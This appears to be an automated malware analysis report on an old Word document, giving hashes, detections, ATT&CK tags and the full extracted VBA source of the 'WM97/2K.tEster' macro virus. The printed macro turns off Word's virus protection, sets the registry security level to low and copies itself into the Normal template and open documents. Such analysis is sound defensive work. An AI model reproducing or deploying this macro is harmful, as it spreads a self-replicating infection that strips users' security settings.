Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ac4d3290ff94cea9…

MALICIOUS

Office (OLE)

27.5 KB Created: 2001-06-28 11:58:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 784921a0036d6211d158324e2a061cdd SHA-1: 7f79887a3a247390ffa261fc5b6b1d02a200c9fd SHA-256: ac4d3290ff94cea9e036d633bbd560cc6bcd04cba3d3d79d9a39ca269af6de73
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is designed to disable security warnings and copy itself to the Normal template and the active document. This behavior aims to establish persistence and ensure the macro executes automatically. The macro also attempts to modify registry keys related to Word's security level, setting it to 1 (low security).

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1866 bytes
SHA-256: 62d4339d505bbeb690d47d4327d507c3a55762d1656aca7192bf4b18b3d67e0a
Detection
ClamAV: Doc.Trojan.Tester-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'WM97/2K.tEster

Private Sub Document_open()
Dim id, vxCopy, ThisDoc, ActiveDoc, NormalDot
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.ShowVisualBasicEditor = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
CommandBars("Macro").Controls("Security...").Enabled = False
CommandBars("Tools").Controls("Macro").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = 1&      'Word 97
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&      'Word 2000
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&     'Word XP!
Set ThisDoc = ThisDocument.VBProject.VBComponents(1).CodeModule
Set NormalDot = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set ActiveDoc = ActiveDocument.VBProject.VBComponents(1).CodeModule
id = "'WM97/2K.tEster"
vxCopy = Strings.Trim(ThisDoc.lines(1, ThisDoc.countoflines))
If id <> NormalDot.lines(1, 1) Then
    NormalDot.deletelines 1, NormalDot.countoflines
    NormalDot.insertlines 1, vxCopy
End If
If id <> ActiveDoc.lines(1, 1) Then
    ActiveDoc.deletelines 1, ActiveDoc.countoflines
    ActiveDoc.insertlines 1, vxCopy
    ActiveDocument.SaveAs ActiveDocument.FullName
End If
'WM97/2K.tEster by gl_st0rm of [mions]
'My first "true" macro virii ever...! ;-)
'Greetz to e[ax] for his WM97/2K.String
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.